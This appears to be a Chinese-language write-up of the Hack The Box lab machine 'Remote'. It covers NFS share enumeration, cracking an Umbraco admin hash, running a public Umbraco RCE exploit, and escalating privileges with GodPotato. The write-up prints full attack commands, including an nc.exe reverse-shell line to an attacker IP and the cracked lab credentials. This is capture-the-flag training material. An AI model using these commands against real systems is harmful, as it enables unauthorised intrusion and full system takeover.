当前位置: 首页 > news >正文

CPTS Remote 复现

nmap -A -T4 -p- -n -Pn 10.10.10.180

在这里插入图片描述
111端口NFS
RPCBind + NFS,如果你发现服务 NFS,那么你可能能够列出和下载(也许还可以上传)文件:
NFS 是一个为 客户端/服务器 设计的系统,使用户能够像访问本地目录中的文件一样,无缝地通过网络访问文件。
默认端口:2049/TCP/UDP(版本 4 除外,只需要 TCP 或 UDP)。

这可以用来 获取 NFSv3 服务器的信息,例如 导出 列表、谁被 允许访问 这些导出,以及哪些客户端已连接(如果客户端在未告知服务器的情况下断开连接,这可能不

showmount -e 10.10.10.180

在这里插入图片描述
挂载

mount -t nfs 10.10.10.180:/site_backups ./site_backups -o nolock

在这里插入图片描述
好像是网站备份文件
枚举网站
在这里插入图片描述
写着Umbraco Forms是渲染此表单所必需的。安装非常简单,您只需前往后台的Umbraco Forms部分,点击安装即可! 😃

来到了一个登陆页面
在这里插入图片描述

在这里插入图片描述
发现hash
adminadmin@htb.localb 8be16afba8c314ad33d812f22a04991b90e2aaa
尝试破解
在这里插入图片描述

john  --wordlist=/usr/share/wordlists/rockyou.txt ./hash

在这里插入图片描述
拿到凭据
admin@htb.local : baconandcheese
成功登陆后台
在这里插入图片描述
在这里插入图片描述
版本为7.12.4,存在RCE命令执行
payload:
https://github.com/Jonoans/Umbraco-RCE

python3 exploit.py -u admin@htb.local -p baconandcheese -i 10.10.14.25 -w http://10.10.10.180

在这里插入图片描述
成功拿到shell

然后

whoami /all

在这里插入图片描述
发现SeImpersonatePrivilege,
上传nc和GodPotato

./GodPotato-NET4.exe -cmd "cmd /c C:\Users\Public\nc.exe 10.10.14.25 8080 -e cmd.exe"

在这里插入图片描述
成功提权

http://www.dtcms.com/a/319670.html

相关文章:

  • Redisson中的分布式锁
  • 自动化办公革命:3小时完成8小时工作量
  • 钢卷矫平机科普:把“弯曲的记忆”清零
  • 人工智能与能源:AI 驱动的能源产业变革
  • MCU-基于TC397的双BootLoader设计方案
  • 关于vue2中对接海康摄像头以及直播流rtsp或rtmp,后台ffmpeg转码后通过ws实现
  • 【linux】vmware中ubuntu无法上网
  • 关于 cadence导入原理图出现ERROR(ORCAP-1192)错误 的解决方法
  • 蓝桥杯算法之搜索章 - 3
  • HarmonyOS分布式开发实战:打造跨设备协同应用
  • C 语言主控开发与显控开发能力体系及技术栈详解,STM32、QT、嵌入式、边缘系统显示
  • 【Vite】Vite 构建 React 项目中 Select a variant 配置选择指南:标准版 vs SWC
  • shell脚本while只循环一次,后续循环失效
  • 解码算法:维特比算法(Viterbi)在SMT中的应用
  • 开发避坑指南(20) :MyBatis操作Oracle插入NULL值异常“无效列类型1111“解决方案
  • 金仓KingbaseES逻辑架构,与Oracle/MySQL对比
  • Windows Oracle 11 g dmp数据库恢复笔记
  • 一种基于CEEMDAN-小波阈值联合降噪-快速谱峭度(FSK)/基尼谱Ginigram/Autogram的故障诊断 Matlab
  • 【已解决】-bash: mvn: command not found
  • [Oracle] FLOOR()函数
  • Oracle 12c + Pl/Sql windows系统下表空间创建、迁移,dmp备份导入,数据库字符集更改
  • 7. 什么是事件委托
  • 试用一个用v语言编写的单文件数据库vsql
  • RepoCoder:仓库级代码补全的迭代检索生成框架解析与应用前沿
  • 【FreeRTOS】(号外)任务间通讯2: 信号量- Counting Semaphore
  • NFS 服务器与iSCSI 服务器
  • USB枚举介绍 以及linux USBFFS应用demo
  • centos安装python、uv
  • Python包与虚拟环境工具全景对比:从virtualenv到uv的演进
  • python中用xlrd、xlwt读取和写入Excel中的日期值